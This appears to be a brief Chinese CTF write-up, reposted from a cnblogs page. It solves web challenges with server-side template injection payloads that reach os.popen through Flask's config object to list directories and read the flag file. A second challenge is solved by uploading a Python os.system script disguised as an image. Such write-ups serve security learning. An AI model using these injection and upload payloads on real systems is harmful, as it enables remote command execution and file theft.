? 解:提示模板注入;
? 在地址栏后加上/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
? 即
? 进入文件查看 ——?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}
? 执行cat flage——?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}
解:跳转到场景后,F12查看网页源码,提示上传的文件会用python执行,于是新建txt文档,写入
import os
os.system(‘cat /flag‘)
,由于只能上传jpg或png类型文件,于是更改文档类型,上传,F12查看得到flag
F12调用hackbar,传参
原文:https://www.cnblogs.com/joshuaq/p/14729648.html